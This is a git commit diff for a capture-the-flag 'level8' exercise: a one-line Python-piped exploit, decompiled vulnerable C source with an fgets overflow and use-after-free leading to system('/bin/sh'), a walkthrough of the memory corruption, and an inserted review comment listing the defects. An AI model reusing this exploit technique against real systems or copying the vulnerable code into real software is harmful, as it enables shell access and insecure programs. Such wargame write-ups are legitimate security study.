level8: done
This commit is contained in:
parent
a8ff8f0105
commit
50afa069df
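--- a/level8/ressources/exploit
+++ b/level8/ressources/exploit
@@ -0,0 +1 @@
+(python -c 'print "auth \nservice" + "A" * 34 + "\n" + "login\n"'; cat) | ./level8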
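--- a/level8/source.c
+++ b/level8/source.c
@@ -0,0 +1,36 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+char *auth;
+int service;
+
+int main(void)
+{
+char s[5];
+char v5[2];
+char v6[129];
+
+while (1) {
+printf("%p, %p \n", auth, (const void *)service);
+if (!fgets(s, 128, stdin))
+break;
+if (!memcmp(s, "auth ", 5)) {
+auth = (char *)malloc(4);
+auth[0] = 0;
+if (strlen(v5) <= 30)
+strcpy(auth, v5);
+}
+if (!memcmp(s, "reset", 5))
+free(auth);
+if (!memcmp(s, "service", 6))
+service = (int)strdup(v6);
+if (!memcmp(s, "login", 5)) {
+if (auth[32])
+system("/bin/sh");
+else
+fwrite("Password:\n", 1, 10, stdout);
+}
+}
+return 0;
+}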
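Review bot: `fgets(s, 128, stdin)` reads up to 127 bytes into the 5-byte `s`, and nothing in the file says this is a reference copy of the decompiled target rather than code meant to be built, so a header comment such as `/* Decompiled from the level8 binary; kept verbatim for the walkthrough, not meant to be compiled or fixed. */` would stop the next reader from "correcting" it. The same comment could list the other defects a reader will trip over: `strlen(v5)` on an uninitialized 2-byte buffer, `service = (int)strdup(v6)` storing a pointer in an `int`, `free(auth)` under `reset` leaving `auth` dangling so a later `login` dereferences freed (or NULL) memory, and `auth[32]` indexing past the 4-byte allocation. If a hardened variant is ever wanted, the minimal changes would be `if (!fgets(s, sizeof s, stdin))`, `free(auth); auth = NULL;`, and a NULL check before `auth[32]`.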
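--- a/level8/walkthrough
+++ b/level8/walkthrough
@@ -0,0 +1,13 @@
+# Level8
+
+Using ghidra, we can decompile the code and see that it loops on a `fgets()` and does a bunch of `memcmp()` with its buffer.
+First of all, we have 2 global variables, `char *auth` and `int service`. Also, we have 3 local buffers (`s`, `v5` and `v6`) with respective sizes of 5, 2 and 129.
+We can see that they are being changed in 2 different `if memcmp()`.
+The first one is when we input `"auth "`. It will allocate 4 bytes to `auth`, then set `auth[0]` to 0.
+The second one is when we input `"service"`. It will `strdup()` the content of `v6` (a random buffer on the stack) to `service`. This is interesting because we can overflow the first buffer `s` (through `fgets(s, 128, stdin)`)until we reach `v6`, thus allowing us to write whatever we want to service. Since `service` is an int, it will overflow to the next variable, which is `char *auth`.
+To make this vulnerability useful, let's see the last `memcmp()`.
+This last `if memcmp()` is triggered with the input `"login"`. It then has an `if/else`, that will open a shell (what we want) in case `auth[32] != 0`.
+Here comes the interesting part, remember we could overflow on `auth` through the `strdup` on `service`.
+
+Here's the full exploit:
+`(python -c 'print "auth \nservice" + "A" * 34 + "\n" + "login\n"'; cat) | ./level8`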